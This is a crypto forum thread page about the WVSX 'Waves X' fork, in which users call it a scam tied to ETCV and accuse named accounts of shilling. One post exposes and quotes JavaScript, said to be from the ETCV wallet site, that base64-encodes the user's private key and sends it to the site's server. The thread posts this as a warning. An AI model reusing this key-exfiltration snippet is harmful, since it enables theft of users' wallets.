Pages:
Author

Topic: [ANN] [WVSX] Waves X - Snapshot of Waves 5:1 - page 8. (Read 24203 times)

Activity: 1918
Merit: 535
Same group of shill accounts too:

Phileste, Loxness, NedStrex, AdamNelson, Kirand, Eyneloisel, etc, etc.

DEFINITE SCAM - STAY AWAY!!!!!!

And Tamandrac.....

in effect, Eyneloisel posts on waves-x, ETCV, but also effmining...
same team looking organized..
legendary
Activity: 1638
Merit: 1033

And Tamandrac.....

See each account getting Merit connected to each other, these accounts are from Russia
Ignore anyone who gives positive comments here
Activity: 168
Merit: 1
I'm interested in the project from the miner's side. Will it be more profitable for me to mine WVSX than other coins?
Activity: 670
Merit: 120
TIME TO BAN THE YOBIT SCAM!!

And Tamandrac.....
Activity: 182
It will have its own DEX too. Interesting but this time its just POS-POW. Waves took 3 years to achieve what they  got but  this one will somehow just fork  and instantly get it. Cool. How much WVSX is needed to stake?  

Is the team related to the ETCV team?

Most probably! Therefore, the same scammers! Stay away at all cost!

Take a more careful look at the patterns of this bounty and compare them with that of ETCV's, the supposed fork of Ethereum. Almost identical. The same people might be behind both scam campaigns! Again, stay away!
Definitely the same scammers. The pattern add up and I recalled when some asked why both design and bounty was similar, they said the hired the same freelancer! What are the chances of two forks hiring the same freelancer and launching within the same week?
The controversial issue is actually a lot of freelancers in the market and everyone offers their services, but to get on the same little
Activity: 670
Merit: 120
TIME TO BAN THE YOBIT SCAM!!

Activity: 476
Merit: 17
It will have its own DEX too. Interesting but this time its just POS-POW. Waves took 3 years to achieve what they  got but  this one will somehow just fork  and instantly get it. Cool. How much WVSX is needed to stake?  

Take a more careful look at the patterns of this bounty and compare them with that of ETCV's, the supposed fork of Ethereum. Almost identical. The same people might be behind both scam campaigns! Again, stay away!
Definitely the same scammers. The pattern add up and I recalled when some asked why both design and bounty was similar, they said the hired the same freelancer! What are the chances of two forks hiring the same freelancer and launching within the same week?
legendary
Activity: 1181
Merit: 1018
SCAM

https://bitcointalksearch.org/topic/ethereum-classic-vision-scam-5095475

https://bitcointalksearch.org/topic/etcv-scammers-must-be-the-same-people-behind-wvsx-5097677

There is another one existing name Ethereum Vision they are all anonymous also, but they are not going for an ICO instead a fork where you can get an ethereum vision token if you have 1 eth in your wallet, I'm following the development in their telegram channel if they happen to ask for private key or link us to phishing site then it's over for them.

Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:

$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });

Activity: 2106
Merit: 282
👉bit.ly/3QXp3oh | 🔥 Ultimate Launc
Hey. Great idea. I think that the price of the token will quickly go up. Unless of course we will see him on exchanges soon.
wvsx most likely won't get listed on any exchange, don't you see forks are nothing but a deliberate scam. if you try claiming your forked coins you will lose your waves, since forks require private keys.
yes all will soon be answered, will waves x slide their products or just to fool many people and pretend to name hardfork which aims to steal many private key people
Activity: 238

Hey. Great idea. I think that the price of the token will quickly go up. Unless of course we will see him on exchanges soon.

You think the price will go up, but it is not listed on any exchange right now. How can it go up, if it is not in any exchange? stop shilling this garbage
That's right, you need to wait for the fork, and then add coins to the crypto exchange.

The main thing is that the token could keep the price in the future, and that they should be traded, of course.
wvsx most likely won't get listed on any exchange, don't you see forks are nothing but a deliberate scam. if you try claiming your forked coins you will lose your waves, since forks require private keys.
Let's hope that the project is really real, if people lose their money is bad, but for now I will follow its development
Activity: 196
Merit: 2

You think the price will go up, but it is not listed on any exchange right now. How can it go up, if it is not in any exchange? stop shilling this garbage
That's right, you need to wait for the fork, and then add coins to the crypto exchange.
Activity: 1246
Merit: 263
Are the project  WavesX directly or indirectly with the official platform of the WaveS?

This is a separate project, they have nothing to do with Waves project. Just using Waves name and source to get an attention from the community, as we can see Waves is a hot topic right now after introduction of Vostok.

Activity: 140
Are the project  WavesX directly or indirectly with the official platform of the WaveS?
Negotiations are under way with cryptocurrency exchanges on the listing of WVSX? Can I see a list of these exchanges?
legendary
Activity: 1612
Merit: 1001
Activity: 756
Merit: 251

Activity: 191
Activity: 140
Merit: 0
What are the conditions for obtaining these tokens. Can you tell me? I would like to understand how safe it is.
You do not risk anything, you just need to invest in Waves, and coins WVSX you get for free.

Very interesting system, how is the date assigned to the fork?

All WAVES holders will receive free WVSX after the hard fork on January 17, 2019. You will get  5 WVSX for each WAVES you hold in your personal wallet.
Thanks for the information, you will need to get a project token, perhaps in the future it can be sold well on the stock exchange, if possible
Yes, it seems it is worth attention. I would also like to receive these tokens. I think he has a future.
What are the conditions for obtaining these tokens. Can you tell me? I would like to understand how safe it is.
You do not risk anything, you just need to invest in Waves, and coins WVSX you get for free.

Very interesting system, how is the date assigned to the fork?

All WAVES holders will receive free WVSX after the hard fork on January 17, 2019. You will get  5 WVSX for each WAVES you hold in your personal wallet.
Thanks for the information, you will need to get a project token, perhaps in the future it can be sold well on the stock exchange, if possible
Pages:
Jump to: